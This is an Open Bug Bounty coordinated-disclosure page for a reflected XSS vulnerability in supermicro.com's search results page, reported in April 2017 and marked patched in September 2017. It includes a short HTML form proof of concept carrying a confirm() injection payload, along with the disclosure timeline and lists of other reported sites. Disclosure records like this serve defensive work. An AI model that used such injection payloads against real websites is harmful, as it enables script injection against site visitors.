Report Email Alerts Open Bug Bounty: 153,961 coordinated disclosures
Total Vulnerabilities Fixed: 74,842
151,298 vulnerable websites, 15,505 VIP websites
3,744 security researchers, 5,224 notification subscribers

Open Bug Bounty ID

OBB-225411

supermicro.com Security Vulnerability

On the 16.04.2017 security researcher xssbuddy Helped patch 140 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 2 recommendations
disclosed XSS vulnerability affecting supermicro.com website.

On our side, we have notified website owner via all reasonable communication channels about the vulnerability, so it can be patched as quickly as possible.

Currently the vulnerability is patched and does not represent any security risk for the website or its visitors.

Vulnerability Details


supermicro.com Description

Super Micro Computer, Inc. Supermicro provides customers around the world with application-optimized server, workstation, blade, embedded, storage and GPU systems. Leveraging our advanced Server Building Block Solutions and system architecture innovations with advanced software and services

Vulnerable URL:

https://www.supermicro.com/SearchToolkit/Search/Results.php

HTTP POST data:

Research's Comment:

PoC :
<form action=https://www.supermicro.com/SearchToolkit/Search/Results.php method="POST">
<input type=hidden name="Search" value="1'-confirm(`OPENBUGBOUNTY`)-'">
<input type=submit value=XSS>
</form>

Other details:

Patched:Yes, at 13.09.2017
Latest check for patch:13.09.2017 08:00 GMT
Vulnerability type:XSS
Vulnerability status:Publicly disclosed
Alexa Rank28873
VIP website status:Yes
Check supermicro.com for malware:Click here
Check supermicro.com SSL connection:Click here (Grade: A+) Refresh Results

Mirror: Click here to view the mirror

Coordinated Disclosure Timeline

Vulnerability submitted via Open Bug Bounty16 April, 2017 20:46 GMT
Vulnerability existence verified and confirmed 17 April, 2017 05:56 GMT
Generic security notifications sent to website owner17 April, 2017 05:56 GMT
Notification sent to subscribers (without technical details)17 April, 2017 06:17 GMT
Vulnerability details disclosed by researcher24 April, 2017 06:14 GMT
Vulnerability patched by the website owner13 September, 2017 08:00 GMT

User Comments:

Please login via twitter to be the first one to comment.


Latest Vulnerabilities on *.supermicro.com

OBB-ID Reported by Status Reported on
patched
16.04.2017

Latest Vulnerabilities Reported by xssbuddy

OBB-ID Vulnerability Status Reported
On Hold
25.09.2017
On Hold
25.09.2017
On Hold
24.09.2017
On Hold
23.09.2017
On Hold
22.09.2017
On Hold
22.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
21.09.2017
On Hold
20.09.2017


LATEST VIP SUBMISSIONS

cccd.edu
Reported by M0r3h4x Helped patch 63 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
payless.com
Reported by cole Helped patch 22 vulnerabilities
Received 1 Coordinated Disclosure badges
on 25.09.2017
hm.com
Reported by cole Helped patch 22 vulnerabilities
Received 1 Coordinated Disclosure badges
on 25.09.2017
1zoom.net
Reported by OmniGooch Helped patch 1079 vulnerabilities
Received 5 Coordinated Disclosure badges
Received 5 recommendations
on 25.09.2017
amur.info
Reported by OmniGooch Helped patch 1079 vulnerabilities
Received 5 Coordinated Disclosure badges
Received 5 recommendations
on 25.09.2017
ehu.eus
Reported by mcurietribute Helped patch 3 vulnerabilities
Received 0 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
princessauto.com
Reported by 0xbsec Helped patch 28 vulnerabilities
Received 1 Coordinated Disclosure badges
on 25.09.2017
weatherbug.com
Reported by login_denied Helped patch 59 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 5 recommendations
on 25.09.2017
windowsitpro.com
Reported by login_denied Helped patch 59 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 5 recommendations
on 25.09.2017
wmj.ru
Reported by login_denied Helped patch 59 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 5 recommendations
on 25.09.2017



LATEST SUBMISSIONS

yvcc.edu
Reported by M0r3h4x Helped patch 63 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
citruscollege.edu
Reported by M0r3h4x Helped patch 63 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
ourchurchweb.org.uk
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
lincoln.ourchurchweb.org.uk
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
alsde.edu
Reported by M0r3h4x Helped patch 63 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017
together.ourchurchweb.org.uk
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
ctfleet.org.uk
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
web.newman.wa.edu.au
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
tick.globalnoc.iu.edu
Reported by SonnySpooks Helped patch 463 vulnerabilities
Received 3 Coordinated Disclosure badges
Received 3 recommendations
on 25.09.2017
wapa.gov
Reported by M0r3h4x Helped patch 63 vulnerabilities
Received 2 Coordinated Disclosure badges
Received 1 recommendations
on 25.09.2017